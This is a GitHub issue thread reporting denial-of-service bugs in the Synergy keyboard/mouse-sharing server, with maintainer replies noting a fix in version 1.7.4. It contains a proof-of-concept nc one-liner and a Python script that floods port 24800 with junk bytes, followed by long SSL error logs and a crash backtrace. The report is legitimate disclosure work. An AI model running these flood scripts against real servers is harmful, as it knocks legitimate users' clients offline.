### ISSUE TITLE
Sending bad packet causes SSL clients to disconnect

### ISSUE THREAD

**Issue by VeNoMouS** [synergy/synergy#4633]
While "mucking around" looking for possible BoF in synergy... discovered that you can simply send one bad packet and cause all clients to disconnect

By simply issuing the following..

```
python -c 'print "A"*1' | nc 127.0.0.1 24800
```

Results in all clients being disconnected and basicly force the server to restart the whole SSL session...

```
NOTE: accepted client connection
ERROR: secure socket error: SSL_ERROR_SYSCALL
INFO: client connection may not be secure
ERROR: an EOF violates the protocol
ERROR: failed to accept secure socket
INFO: accepted secure socket
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140780E5:SSL routines:SSL23_READ:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
NOTE: new client disconnected
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:140790E5:SSL routines:SSL23_WRITE:ssl handshake failure
ERROR: secure socket error: SSL_ERROR_SSL
ERROR: error:2006F079:BIO routines:BIO_read:unsupported method
NOTE: client "WL41028" is dead
NOTE: accepted client connection
INFO: accepted secure socket
NOTE: client "wl41028" has connected```

**Comment by VeNoMouS** [comment]
Addtionally some simple as the following can cause the whole synergys daemon to segfault and crash completely...

```
#!/usr/bin/python

import sys, socket
buffer = "\x41"* 8096
for i in range(1,20):
        print "[+] Sending..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
        s.connect(("127.0.0.1",24800)) 
        s.send(buffer) 
        s.close() 
```

While it seems to be random how many packets are actually requires to crash ive found anywhere from 10-40 packets are required...

```
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff5455700 (LWP 18132)]
0x00007ffff3f3236b in ?? () from /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0
(gdb) bt
#0  0x00007ffff3f3236b in ?? () from /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0
#1  0x00007ffff3f32539 in ?? () from /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0
#2  0x00007ffff3f33c45 in ?? () from /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0
#3  0x00007ffff3f34278 in ?? () from /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0
#4  0x00007ffff3f35292 in ?? () from /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0
#5  0x00007ffff4a31085 in SecureSocket::secureWrite(void const*, unsigned int) () from /root/.synergy/plugins/libns.so
#6  0x00000000004ad4ed in TCPSocket::serviceConnected(ISocketMultiplexerJob*, bool, bool, bool) ()
#7  0x00000000004aa018 in SocketMultiplexer::serviceThread(void*) ()
#8  0x00000000004af06b in Thread::threadFunc(void*) ()
#9  0x0000000000444668 in ArchMultithreadPosix::doThreadFunc(ArchThreadImpl*) ()
#10 0x000000000044473b in ArchMultithreadPosix::threadFunc(void*) ()
#11 0x00007ffff7bc70a4 in start_thread (arg=0x7ffff5455700) at pthread_create.c:309
#12 0x00007ffff666904d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111
(gdb) 
```

**Comment by speaker** [comment]
@VeNoMouS Are you still able to reproduce this with the newest 1.7.4 builds? I've been trying and haven't had any success thus far.

**Comment by VeNoMouS** [comment]
No it doesnt appear to segfault anymore... but how ever... if you run the code i posted earlier

```
#!/usr/bin/python

import sys, socket
buffer = "\x41"* 8096
for i in range(1,20):
        print "[+] Sending..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
        s.connect(("127.0.0.1",24800)) 
        s.send(buffer) 
        s.close() 
```

It causes the Synergy server service to "lockup" and loose clients and you can not move/do anything on the clients... , so this is still effectively a DoS attack to the service.

This is due to the SSL negotiation happening and lack of threading with new clients... and it all being handed in the one thread... if you continuously send packets the client wont "reconnect" until it has finished processing the "malformed" bad packets...

There needs to be some form of banner negotiation at the start... to verify its a valid client... and drop connection if not... ether that or introduce threads for each client connection.... with a set limit of threads...

```
NOTE: starting server
NOTE: config file: /tmp/qt_temp.Y17219
NOTE: log level: INFO
INFO: started server, waiting for clients
INFO: accepted client connection
INFO: accepted secure socket
INFO: client "wl41028" has connected
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
INFO: switch from "wl41988" to "wl41028" at 1919,656
INFO: leaving screen
INFO: screen "wl41988" updated clipboard 0
INFO: screen "wl41988" updated clipboard 1
ERROR: ssl error occurred (system call failure)
ERROR: eof violates ssl protocol
ERROR: failed to accept secure socket
INFO: client connection may not be secure
INFO: accepted client connection
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
INFO: client "WL41028" has disconnected
INFO: switch from "wl41028" to "wl41988" at 5,735
INFO: entering screen
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (system call failure)
ERROR: eof violates ssl protocol
ERROR: failed to accept secure socket
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
INFO: accepted client connection
INFO: client connection may not be secure
ERROR: ssl error occurred (generic failure)
ERROR: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
ERROR: failed to accept secure socket
```

**Comment by speaker** [comment]
@VeNoMouS Thank you for checking. I'll open up a new issue to cover the flooding issue, but I'm not as sure on the priority given how we normally operate. If an attacker can get into a persons home network, there are a lot more interesting things to do than make Synergy unstable...

Opened #4819 to track DoS attack vector

**Comment by speaker** [comment]
Fixed by 1.7.4

**Comment by VeNoMouS** [comment]
Completely agree about more things need attention to fix in synergy , but not all of us are home users... I only use it at work and I work in a massive WAN enterprise environment so its still relevant to some :P
